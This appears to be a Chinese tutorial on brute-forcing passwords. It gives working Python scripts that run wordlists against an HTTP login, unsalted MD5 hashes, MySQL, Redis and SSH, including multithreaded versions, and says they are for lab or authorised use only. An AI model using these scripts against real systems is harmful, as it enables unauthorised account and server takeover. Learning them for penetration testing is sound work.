暴力破解
1 概述
暴力破解(brute force),是一种针对密码的破译方法:把字典中的候选密码逐个尝试,直到命中真正的密码为止。注意:下面的脚本只能用于自己搭建的实验环境或已获得明确授权的目标。
2 爆破HTTP协议
第一步:先发送一次实验性的登录请求,确认请求格式正确,并记下登录失败时的响应(本例中响应体为 login-fail),后续以此判断是否命中
import requests
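url = "http://192.172.0.100:8080/woniusales/user/login"
# NOTE(review): 192.172.0.0/16 is not an RFC 1918 private range; make sure
# this really is your own lab host before sending any traffic to it.
data = {
    "username": "admin",
    "password": "123456",
    "verifycode": "0000",
}
# A timeout keeps a stalled server from hanging the script forever.
result = requests.post(url=url, data=data, timeout=10)
# The lab app answers the literal body "login-fail" on a bad login. Anything
# else is only a *candidate* success: error pages, lockout notices and
# captcha rejections also differ from "login-fail", hence the wording.
# (The original f-string referenced an undefined name `password`.)
if result.text != "login-fail":
    print(f"疑是破解成功,密码是:{data['password']}")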
 
第二步:已知用户名,未知密码破解
import requests
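def pojie_http(password):
    """Try one password for the fixed user ``admin`` against the lab login.

    Posts the form the login page expects and prints the candidate when
    the response body is not the literal failure marker ``login-fail``;
    on a hit the whole script stops via ``SystemExit``.

    Args:
        password: candidate password (already stripped of its newline).

    Raises:
        SystemExit: when the response does not look like a failed login.
    """
    url = "http://192.172.0.100:8080/woniusales/user/login"
    data = {
        "username": "admin",  # was the bare name `admin` -> NameError
        "password": password,
        "verifycode": "0000",
    }
    # Bound the wait so one stalled request cannot hang the whole run.
    result = requests.post(url=url, data=data, timeout=10)
    # Anything other than "login-fail" is only a candidate: a 5xx page, a
    # lockout notice or a captcha error also differ from that marker.
    # Confirm the hit by hand before trusting it.
    if result.text != "login-fail":
        print(f"疑是破解成功,密码是:{password}")
        # Explicit form of the interactive helper exit(); same exit code.
        raise SystemExit(0)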
# Read the wordlist once, one candidate per line. Only the surrounding
# whitespace/newline is removed; a blank line is still tried as "".
with open(file="password.txt") as f:
    passwordlist = f.readlines()
for candidate in map(str.strip, passwordlist):
    pojie_http(candidate)
 
第三步:未知用户名密码破解
import requests
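def pojie_http(username, password):
    """Try one username/password pair against the lab login.

    Posts the form the login page expects and prints the pair when the
    response body is not the literal failure marker ``login-fail``; on a
    hit the whole script stops via ``SystemExit``.

    Args:
        username: candidate user name (already stripped).
        password: candidate password (already stripped).

    Raises:
        SystemExit: when the response does not look like a failed login.
    """
    url = "http://192.172.0.100:8080/woniusales/user/login"
    data = {
        "username": username,
        "password": password,
        "verifycode": "0000",
    }
    # Bound the wait so one stalled request cannot hang the whole run.
    result = requests.post(url=url, data=data, timeout=10)
    # Anything other than "login-fail" is only a candidate: a 5xx page, a
    # lockout notice or a captcha error also differ from that marker.
    # Confirm the hit by hand before trusting it.
    if result.text != "login-fail":
        # Report the user too -- with many users the password alone is useless.
        print(f"疑是破解成功,用户名是{username},密码是:{password}")
        raise SystemExit(0)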
with open(file="password.txt") as f:
    passwordlist = f.readlines()
with open(file="username.txt") as f:
    usernamelist = f.readlines()
# Users outermost: every password is tried for one user before moving on.
# Both lists still carry their trailing newlines, hence the strip() calls.
for raw_user in usernamelist:
    user = raw_user.strip()
    for raw_pass in passwordlist:
        pojie_http(user, raw_pass.strip())
 
注意:
1.暴力破解不是100%能破解成功,取决于你是否有强大的字典
2.并不是所有的HTTP登录接口都能暴力破解,本文的方法通常要同时满足以下条件:
 2.1 验证码简单或可绕过(本例中verifycode固定填0000即可通过)
 2.2 没有错误次数限制(如账户锁定)
 2.3 密码以明文提交,未经过加密或签名(否则需先还原前端的加密逻辑)
3 多线程破解
一个用户作为一个线程爆破
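import threading

# One worker thread per user. The target must be a ONE-argument worker that
# tries every password for `user`: the two-argument pojie_http(username,
# password) from step 3 cannot be started with args=(user,).
workers = []
for user in usernamelist:
    user = user.strip()  # readlines() leaves the trailing newline in place
    worker = threading.Thread(target=pojie_http, args=(user,))
    worker.start()
    workers.append(worker)
# Wait for every worker. Caveat: exit()/SystemExit raised inside a worker
# only ends THAT thread (threading swallows it), the others keep going; a
# shared threading.Event checked before each request is the real stop switch.
for worker in workers:
    worker.join()
# 1. Limited by the local machine: the author's box topped out around
#    1300 threads.
# 2. Limited by the server: its maximum throughput.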
 
4 多线程分配任务破解
import threading
import requests
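# Set by whichever worker finds a valid login; every worker polls it so the
# remaining threads stop instead of hammering the server. exit() inside a
# worker would only end that one thread (threading swallows SystemExit).
found = threading.Event()


def pojie_http(startindex, endindex):
    """Worker: try every password for ``usernamelist[startindex:endindex]``.

    Reads the module-level ``usernamelist`` / ``passwordlist`` (filled in
    by the ``__main__`` block below). On the first response whose body is
    not the literal failure marker ``login-fail`` it prints the pair and
    sets ``found`` so all workers wind down.

    Args:
        startindex: first index of this worker's slice of ``usernamelist``.
        endindex: one past the last index (ordinary slice semantics).
    """
    url = "http://192.172.0.100:8080/woniusales/user/login"
    for user in usernamelist[startindex:endindex]:
        user = user.strip()
        for passwd in passwordlist:
            if found.is_set():
                return
            passwd = passwd.strip()
            data = {
                "username": user,
                "password": passwd,
                "verifycode": "0000",
            }
            # Bound the wait so a stalled request cannot hang this worker.
            result = requests.post(url=url, data=data, timeout=10)
            # Anything but "login-fail" is only a candidate (error pages,
            # lockout notices and captcha rejections also differ from it);
            # confirm by hand before trusting the hit.
            if result.text != "login-fail":
                print(f"疑是破解成功,用户名是{user},密码是:{passwd}")
                found.set()
                return


if __name__ == '__main__':
    with open(file="username.txt") as f:
        usernamelist = f.readlines()
    with open(file="password.txt") as f:
        passwordlist = f.readlines()
    # Split the users into fixed-size chunks, one worker thread per chunk;
    # each worker tries every password for each of its users. Tune
    # chunk_size to what the server (and this machine) can sustain. Sizing
    # from len(usernamelist) replaces the hard-coded 100 x 20 = 2000 users.
    chunk_size = 20
    workers = []
    for start in range(0, len(usernamelist), chunk_size):
        worker = threading.Thread(
            target=pojie_http, args=(start, start + chunk_size)
        )
        worker.start()
        workers.append(worker)
    # Block until every worker has exhausted its slice or seen `found`.
    for worker in workers:
        worker.join()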
 
5 MD5爆破
MD5是单向散列而不是加密,无法从摘要逆推出原文;所谓"破解"只是把字典里的候选值逐个计算MD5并与目标摘要比对(查表法),因此只对未加盐的MD5有效。
import hashlib
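def pojie_md5(source, target):
    """Hash one candidate with MD5 and compare it to the target digest.

    MD5 cannot be reversed; this is a dictionary lookup, so it only works
    for an unsalted MD5 of the plain candidate. On a match the candidate is
    printed and the script stops via ``SystemExit``.

    Args:
        source: candidate plaintext (already stripped). It is hashed as
            UTF-8; a digest produced from another encoding of a non-ASCII
            password will not match.
        target: expected 32-character hex MD5 digest. Case and surrounding
            whitespace are ignored, so an upper-case hash copied from a
            dump still matches (``hexdigest()`` is always lower-case).

    Raises:
        SystemExit: on a match.
    """
    h_md5 = hashlib.md5(source.encode()).hexdigest()
    # No per-candidate print: echoing every hash drowns the one useful line.
    if h_md5 == target.strip().lower():
        print(f"怀疑是破解成功:{source}")
        raise SystemExit(0)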
if __name__ == '__main__':
    # Digest to look up (this one is MD5("123456")).
    target = "e10adc3949ba59abbe56e057f20f883e"
    with open(file="password.txt") as f:
        data_list = f.readlines()
    # Strip the newline from each candidate before hashing it.
    for candidate in map(str.strip, data_list):
        pojie_md5(source=candidate, target=target)
 
6 MySQL爆破
import pymysql
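def pojie_mysql(passwd):
    """Try one password for ``root`` on the lab MySQL server.

    ``pymysql.connect()`` raises on failure and returns a connection on
    success; a successful connection is closed straight away. Only an
    access-denied error (MySQL error 1045) counts as "wrong password";
    any other OperationalError (host unreachable, host not allowed, too
    many connections, ...) is re-raised so the run does not silently burn
    the whole wordlist against a server it cannot even log in to. The
    bare ``except:`` this replaces also swallowed KeyboardInterrupt.

    Args:
        passwd: candidate password (already stripped).

    Raises:
        SystemExit: on a successful login.
        pymysql.err.OperationalError: for non-authentication failures.
    """
    try:
        conn = pymysql.connect(
            user="root",
            password=passwd,
            port=3306,
            host="192.172.0.100",
            connect_timeout=5,  # do not hang on a silent host
        )
    except pymysql.err.OperationalError as err:
        # err.args[0] is the MySQL error number; 1045 = ER_ACCESS_DENIED_ERROR.
        if err.args[0] != 1045:
            raise
        return
    # Connected, so the password is right; release the session immediately.
    conn.close()
    print(f"疑是破解成功:{passwd}")
    raise SystemExit(0)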
if __name__ == '__main__':
    with open(file="password.txt") as f:
        data_list = f.readlines()
    # One connection attempt per line, newline stripped.
    for candidate in map(str.strip, data_list):
        pojie_mysql(candidate)
 
7 Redis爆破
import redis
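def pojie_redis(passwd):
    """Try one password against the lab Redis instance.

    ``redis.Redis(...)`` does not connect; ``ping()`` is what opens the
    socket and sends AUTH, so that is where a wrong password shows up.
    A wrong password raises AuthenticationError; a plain ResponseError
    covers servers that reject AUTH because no password is configured
    at all (then there is nothing to brute-force). A ConnectionError
    means the host is unreachable and is re-raised so the run stops
    instead of silently failing for every candidate. The bare
    ``except:`` this replaces also swallowed KeyboardInterrupt.

    Args:
        passwd: candidate password (already stripped).

    Raises:
        SystemExit: on a successful AUTH + PING.
        redis.exceptions.ConnectionError: when the server cannot be reached.
    """
    redis_obj = redis.Redis(
        host="192.172.0.101",
        password=passwd,
        db=0,
        socket_timeout=5,
        socket_connect_timeout=5,
    )
    try:
        redis_obj.ping()
    except redis.exceptions.AuthenticationError:
        # Subclass of ConnectionError, so it must be caught first.
        return  # wrong password
    except redis.exceptions.ResponseError:
        return  # e.g. AUTH rejected because the server has no password set
    finally:
        # Drop the pooled socket whether this was a hit or a miss.
        redis_obj.connection_pool.disconnect()
    print(f"密码是{passwd}")
    raise SystemExit(0)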
if __name__ == '__main__':
    with open(file="password.txt") as f:
        data_list = f.readlines()
    # One AUTH attempt per line, newline stripped.
    for candidate in map(str.strip, data_list):
        pojie_redis(candidate)
 
8 SSH爆破
import paramiko
from paramiko.client import AutoAddPolicy
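def pojie_ssh(passwd):
    """Try one password for ``root`` over SSH on the lab host.

    A wrong password raises ``paramiko.AuthenticationException``; anything
    else (no route, banner timeout, protocol error) is re-raised so the
    run stops instead of silently skipping every candidate. The client is
    always closed. The bare ``except:`` this replaces also swallowed
    KeyboardInterrupt.

    ``allow_agent=False`` / ``look_for_keys=False`` stop paramiko from
    trying the ssh-agent and ~/.ssh keys before the password: otherwise a
    "hit" could be a local key logging in, not the password under test.

    Args:
        passwd: candidate password (already stripped).

    Raises:
        SystemExit: on a successful login.
        paramiko.SSHException, OSError: for non-authentication failures.
    """
    ssh = paramiko.SSHClient()
    # Lab-only: auto-accepting unknown host keys gives up MITM protection.
    # An instance is the documented form; passing the bare class relies on
    # newer paramiko instantiating it for you.
    ssh.set_missing_host_key_policy(AutoAddPolicy())
    try:
        ssh.connect(
            hostname="192.172.0.100",
            username="root",
            password=passwd,
            allow_agent=False,
            look_for_keys=False,
            timeout=10,
            banner_timeout=10,
        )
    except paramiko.AuthenticationException:
        return  # wrong password
    finally:
        ssh.close()  # harmless on a client that never connected
    print(f"密码是{passwd}")
    raise SystemExit(0)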
if __name__ == '__main__':
    with open(file="password.txt") as f:
        data_list = f.readlines()
    # One SSH login attempt per line, newline stripped.
    for candidate in map(str.strip, data_list):
        pojie_ssh(candidate)
 
9 爆破工具
https://blog.csdn.net/m0_59598029/article/details/133217000
https://blog.51cto.com/u_16213303/10539031
https://www.zhihu.com/tardis/bd/art/558677293?source_id=1001




















